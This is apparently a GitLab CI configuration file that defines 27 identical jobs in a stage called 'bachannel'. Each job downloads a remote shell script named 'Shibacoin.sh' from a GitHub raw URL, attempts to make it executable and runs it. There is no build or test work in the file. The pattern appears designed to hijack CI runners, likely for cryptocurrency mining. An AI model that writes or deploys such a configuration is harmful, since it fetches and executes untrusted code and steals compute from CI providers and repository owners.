bachannel_1:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_2:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_3:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_4:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_5:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_6:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_7:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_8:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_9:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_10:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_11:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_12:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_13:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_14:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_15:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_16:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_17:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_18:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_19:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_20:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_21:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_22:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_23:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_24:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_25:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_26:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh

bachannel_27:
stage: bachannel
scripts:
- wget https://raw.githubusercontent.com/legalspeedinves/Vpss/main/Shibacoin.sh && cmod U+X Shibacoin.sh && ./Shibacoin.sh